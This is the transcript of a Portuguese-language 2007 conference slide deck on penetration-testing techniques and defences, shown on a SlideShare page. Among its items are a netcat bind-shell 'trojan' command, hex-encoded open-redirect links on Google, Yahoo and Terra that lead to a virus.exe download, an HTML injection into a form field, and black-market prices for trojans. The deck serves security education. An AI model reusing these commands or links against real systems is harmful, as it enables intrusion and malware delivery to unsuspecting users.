Your SlideShare is downloading. ×
Pentest conisli07
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Pentest conisli07

454

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
454
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
28
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. PENTESTTécnicas de invasão e defesa Cleber Souza Brandao clebeer@gmail.com
  • 2. Cleber Brandãocbrandao@brc.com.br
  • 3. About me Utilizo linux há 7 anos Aulas de linux Faculdades Radial Formado Gerenciamento de Redes Suporte e aulas Projeto Telecentros SP Participante do ISSA-Brasil Testes de performance e segurança BRconnection®
  • 4. Tópicos Técnicas de Invasão  Técnicas contra InvasãoDefinindo um alvo Firewall + IDSRecolhendo informações HIDSFerramentas úteis HoneyPotsPhishing AntispamEsteganografia
  • 5. Técnicas de invasão Engenharia social Brute Force Espionagem Segurança por obscuridade
  • 6. Definindo um alvo Onde buscar informações?googlemyspaceorkutgoogle groups
  • 7. GoogleBuscas específicasUtilizando recursos avançados do google como as tags Intitle, Inurl, IntextPodem te trazer resultados muito interessantes.
  • 8. Engenharia social
  • 9. Adão e Eva Primeiras vitimas de engenharia social
  • 10. Apenas 2 coisas no mundo são infinitas, o universo e a estupidez humana. (Albert Einstein)
  • 11. Ferramentas úteis google  sendip dig  john the ripper nmap  host nessus  hping3 Metasploit  netcat telnet
  • 12. dig Uma ferramenta similar ou nslookup porém mais flexível, pode ser utilizada para fazer buscas como A,TXT, MX e NS.
  • 13. dig +qr google.com any;; ANSWER SECTION:google.com. 10186 IN MX 10 smtp2.google.com.google.com. 10186 IN MX 10 smtp3.google.com.google.com. 10186 IN MX 10 smtp4.google.com.google.com. 10186 IN MX 10 smtp1.google.com.google.com. 318637 IN NS ns1.google.com.google.com. 318637 IN NS ns2.google.com.google.com. 318637 IN NS ns3.google.com.google.com. 318637 IN NS ns4.google.com.;; AUTHORITY SECTION:google.com. 318637 IN NS ns2.google.com.google.com. 318637 IN NS ns3.google.com.google.com. 318637 IN NS ns4.google.com.google.com. 318637 IN NS ns1.google.com.;; ADDITIONAL SECTION:smtp1.google.com. 2986 IN A 72.14.203.25smtp2.google.com. 2986 IN A 64.233.167.25smtp3.google.com. 2986 IN A 64.233.183.25smtp4.google.com. 2986 IN A 72.14.215.25ns1.google.com. 345220 IN A 216.239.32.10ns2.google.com. 345220 IN A 216.239.34.10ns3.google.com. 345219 IN A 216.239.36.10ns4.google.com. 345219 IN A 216.239.38.10
  • 14. PortScan
  • 15. Nmap é o mais famoso portscan existente hoje. (www.insecure.org/nmap). É uma ótima ferramenta, muito utilizado por hackers, para descobrir falhas no sistema, em portas abertas desnecessariamente.
  • 16. Nessus O Nessus é uma ferramenta de auditoria muito usada para detectar e corrigir vulnerabilidades nos PCs da rede local porem é muito utilizado por hackers para descobrir a vulnerabilidade de um alvo.
  • 17. ReportsNessus Scan ReportSUMMARY- Number of hosts which were alive during the test : 1- Number of security holes found : 1- Number of security warnings found : 1- Number of security notes found : 15
  • 18. ReportsDETAILS. List of open ports : o smtp (25/tcp) (Security notes found) o ssh (22/tcp) (Security notes found) o ftp (21/tcp) (Security notes found)
  • 19. ReportsInformation found on port smtp (25/tcp) An SMTP server is running on this port Here is its banner : 220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov 2007 09:35:31 -0300; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1]. Information found on port smtp (25/tcp) Remote SMTP server banner : 220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov 2007 09:35:57 -0300; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1] This is probably: Sendmail version 8.14.1
  • 20. Reports. Information found on port ssh (22/tcp) An ssh server is running on this port. Information found on port ssh (22/tcp) Remote SSH version : SSH-2.0-OpenSSH_4.6p1 Debian-5build1 Remote SSH supported authentication : publickey,password Remote SSH banner : CleBeers |_b note.
  • 21. Reports
  • 22. Metasploit é um ambiente utilizado para escrever, testar, e executa códigos de exploit. Foi desenvolvido para prover penetraçãoe testes em computadores relacionados a esse assunto, como também pesquisa de vulnerabilidade.
  • 23. Metasploit Linha de comando Interface web
  • 24. http://127.0.0.1:55555/
  • 25. http://127.0.0.1:55555/
  • 26. msfconsole
  • 27. telnet www.alvo.com.br 80Trying 200.189.171.181...Connected to www.alvo.com.br.Escape character is ^].GET / HTTP/1.1Host: www.alvo.com.br
  • 28. ResultadoServer: Microsoft-IIS/5.0X-Powered-By: ASP.NETContent-Location: http://www.alvo.com.br/index.htmDate: Thu, 01 Nov 2007 13:26:39 GMTContent-Type: text/htmlAccept-Ranges: bytesLast-Modified: Tue, 19 Sep 2006 00:27:32 GMT
  • 29. John the ripper Um programa usado para decifrar senhas suportado nas plataformas UNIX, DOS, WinNT?/Win95. É um programa disponível gratuitamente desenvolvido para decifrar senhas MD5, DES baseado na função CRYPT.
  • 30. Usar senhas fortes?
  • 31. Nem sempre é a solução
  • 32. hping3 Mais uma ferramenta capaz de enviar pacotes TCP, UDP e ICMP personalizados e receber respostas como consegue em icmp. Com ele você pode enviar arquivos encapsulados e é util para ataques DoS.
  • 33. netcat Programa para consultoria de redes muito conhecido, isso deve-se ao fato de ele ser um programa muito versátil, podendo desde ser um simples telnet, portscan até um sniffer.
  • 34. Trojannc -l -e /bin/bash -p 1033A porta 1033 será colocada em listenning, redirecionaremos a saída de dados para um shell (/bin/bash). Assim quando alguém se conectar a essa porta terá domínio total sobre o computador.
  • 35. Sniffer# nc -vv -z 75.126.176.71 -p 80 22 110 25 21servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refusedservidor9.molservidores.com [75.126.176.71] 110 (pop3) openservidor9.molservidores.com [75.126.176.71] 25 (smtp) openservidor9.molservidores.com [75.126.176.71] 21 (ftp) open
  • 36. Phishing
  • 37. O que é phishing?Phishing é um tipo de fraude projetada para roubar sua identidade. Em um phishing scam, uma pessoa mal-intencionada tenta obter informações como números de cartões de crédito, senhas, dados de contas ou outras informações pessoais convencendo você a fornecê-las sob pretextos enganosos.
  • 38. ExemplosAlguns sites famosos que permitem este tipo de fake:googleyahooterra
  • 39. Google http://www.google.com/pagead/iclk?sa=l&ai=Br3ycNQz5Q- fXBJGSiQLU0eDSAueHkArnhtWZAu- FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f- P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NLQH0sz4&num=5&a durl=%63%6c%65%62%65%65%72%2e%6e%6f%2d%69%70%2e %6f%72%67%2f%76%69%72%75%73%2e%65%78%65
  • 40. Yahoo http://br.wrs.yahoo.com/_ylt=A0geum1Mv9RGw4EB6FXz6Qt./SIG=1 29lovkbd/EXP=1188434124/**%63%6c%65%62%65%65%72%2e %6e%6f%2d%69%70%2e%6f%72%67%2f %76%69%72%75%73%2e%65%78%65
  • 41. Buscador terra http://buscador.terra.com.br/Redirector.aspx? bstat=terrastats01&type=CK&source=buscador.terra.com.br&id=spon sored&partner=google&query=nike&position=1&target=%63%6c %65%62%65%65%72%2e%6e%6f%2d%69%70%2e%6f %72%67%2f%76%69%72%75%73%2e%65%78%65
  • 42. Destino??? Nas 3 URLs anteriores a requisição seria encaminhada para: clebeer.no-ip.org/virus.exe
  • 43. Outro Exemplohttp://www.cceinformatica.com.br/faleNew.php?mail=cvv@cce.com.br
  • 44. Adicionando...&tipo=%3Cimg%20src=http://images.clebeer.multiply.com/logo/2%3E
  • 45. Esteganografia Esteganografia basicamente é uma técnica de esconder um arquivo dentro de outro arquivo, podendo ser uma imagem , ou documento do Word até mesmo uma planilha de excel e etc só que de uma forma criptografada.
  • 46. jp(hide an seek) O jphide e o jpseek são programas utilizados para esconder mensagens em arquivos JPEG.
  • 47. origem.jpg
  • 48. destino.jpg
  • 49. msg.txtOla esta mensagem e secretae somente pessoas que possuam a senha podem vê-lasenha: @@(##!(*#$#*(!(@&%$(@)codDEVdw)2231
  • 50. Utilização Esconder mensagem:jphide origem.jpg destino.jpg mensagem.txt Descobir mensagem:jpseek destino.jpg texto-secreto.txt
  • 51. Quanto vale? Trojan (Shell) - US$ 350,00 - US$700,00 Trojan (Roubo de Senhas) - US$600,00 Listagem E-mail (32 milhões) - US$1.500,00 Milhões de Usuários do ICQ - US$150,00 Proteção Contra Detecção do Trojan - US$20,00 Suporte
  • 52. Tecnicas contra invasão Firewall (NHWK)IDS HoneyPots Antispam
  • 53. Firewall Port Knock, uma solução leve e fácil de configurar, permite que portas específicas só sejam abertas no momento desejado atraves de tentativas de conexão em portas específicas.
  • 54. *IDS NIDS – Network Intrusion Detection System HIDS - Host-based Intrusion Detection System WIDS – Wireless Intrusion Detection System KIDS - Kernel Intrusion Detection System
  • 55. Honeypot Útil para vigilância e alerta aos tipos de ataques mais utilizados porem deve ser utilizado com cuidado para que o invasor não tenha acesso a rede real.
  • 56. Antispam Indispensável para qualquer MX, útil para evitar emails forjados e de domínios não confiaveis, pode ser incrementado com opções de RBL e CAPTCHA ("Completely Automated Public Turing test to tell Computers and Humans Apart").
  • 57. Conclusão Com a popularidade do SL a informação ficou mais acessível o que colaborou para um maior avanço das técnicas de invasão, em contra partida os sistemas de segurança vem se tornando mais estáveis a casa dia.
  • 58. Créditos www.google.com www.brc.com.br naopod.com.br spookerlabs.multiply.com http://cartilha.cert.br/malware/
  • 59. Perguntas
  • 60. OBRIGADO!

×